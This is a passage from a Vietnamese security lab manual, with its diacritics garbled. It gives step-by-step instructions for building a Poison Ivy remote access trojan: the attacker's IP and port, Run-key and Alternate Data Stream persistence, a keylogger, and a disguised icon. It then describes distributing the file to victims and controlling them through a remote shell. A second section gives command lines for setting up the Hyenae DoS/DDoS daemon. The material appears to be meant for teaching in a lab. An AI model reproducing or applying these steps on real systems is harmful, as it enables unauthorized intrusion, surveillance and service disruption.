6. S Dng Poison Ivy t o Botnet u tin ta cn phi to ra mt file Remote Access Trojan v gi file ny n victim. Sau khi install, my victim tr thnh zombie b iu khin bi attacker. Decompress chng trnh v thc thi file Poison Ivy

44

lick I Agree, Sau chn mc New Server

Tip tc ta chn to ra mt New Profile

Ta nh p vo cc thng s :

45

o IP ca m y ng vai tr l server zombie connect v v port tng ng. Mc nh chng trnh dng port 3460. Mt khc ta c th to ra nhiu profile khc nhau, mi profile tng ng v i 1 port trn my attacker o Nh p vo mc ID: v d l server_test o Password ng nh p c th s l password dng static hoc l s dng dynamic key o Tip tc click Next gc phi mn hnh

Tip tc chng trnh s chuyn qua mc Install. Ta cn nh p vo cc thng s sau o HKLM/Run Name: o ActiveX Key Name o Copy File: ta nh p vo v i tn c dng l .exe hoc l dng .scr o Ta c th chn dng opy to Alternate Data Stream n file

46

lick Next chng trnh chuyn phn Advance. Ta c th chn cc tnh nng Key logger, Format dng PE

lick Next chng trnh chuyn qua mc uild, ta c th chuyn icon ca file zombie, lick Generate , x c nh v tr lu tr, tn file zombie

47

v tr my attacker, ta s dng t nh nng New lient qun l cc kt n i t cc zombie, chn vo tn Profile m attacker to.

48

hng trnh yu cu ta phi nh p vo PASSWORD hoc l ta phi LOAD KEY ty thuc vo phng thc password cu hnh trn

Tip tc ta thc hin cng vic pht tn file zombie dos_server.exe

Sau khi client kch hot file dos_server.exe, ta kim tra cc kt n i ta thy xut hin mt kt n i

49

Ta Double-click vo dng biu th cho client, hin th y cc tc v m attacker c th lm i v i zombie ( ty thuc vo cu hnh ban u )

V d ta chn Remote Shell v Active c c giao din dng lnh ca zombie

50

51

7. Dos v DdoS b ng cng c Hyenae - Download chng trnh ti http://sourceforge.net/projects/hyenae/files/ hng trnh ny cho php ta thc hin tn cng DoS v DdoS. thc hin DdoS ta cn phi install Hyenae daemon trn 1 m y, sau s dng Hyenae Front End ( giao din ) hoc Hyenae ( dng lnh iu khin ) - Trong bi lab ny ta s install Hyenae daemon trn my Window server 2003 (192.168.1.100/24) v s dng Window XP (192.168.1.101/24) lm client iu khin.

52

u tin ta s cu hnh hyenaed kim tra cc card trong my tnh C:\> hyenaed.exe -l kim tra cc card mng c nh n trong chng trnh Gi s chng trnh nh n card Intel Pro/1000 MT c nh n l s 1 Cu hnh hyenaed.exe lng nghe trn my tnh server 2003 C:\> hyenaed.exe -I 1 -a 192.168.1.100 p 8888 u 10000 k 123abc!!! -I: card kt n i vo -a: bind v i IP -p: port -u: s lng packet gi cho mi ln kt n i S dng hyenae.exe dng front end kt n i

53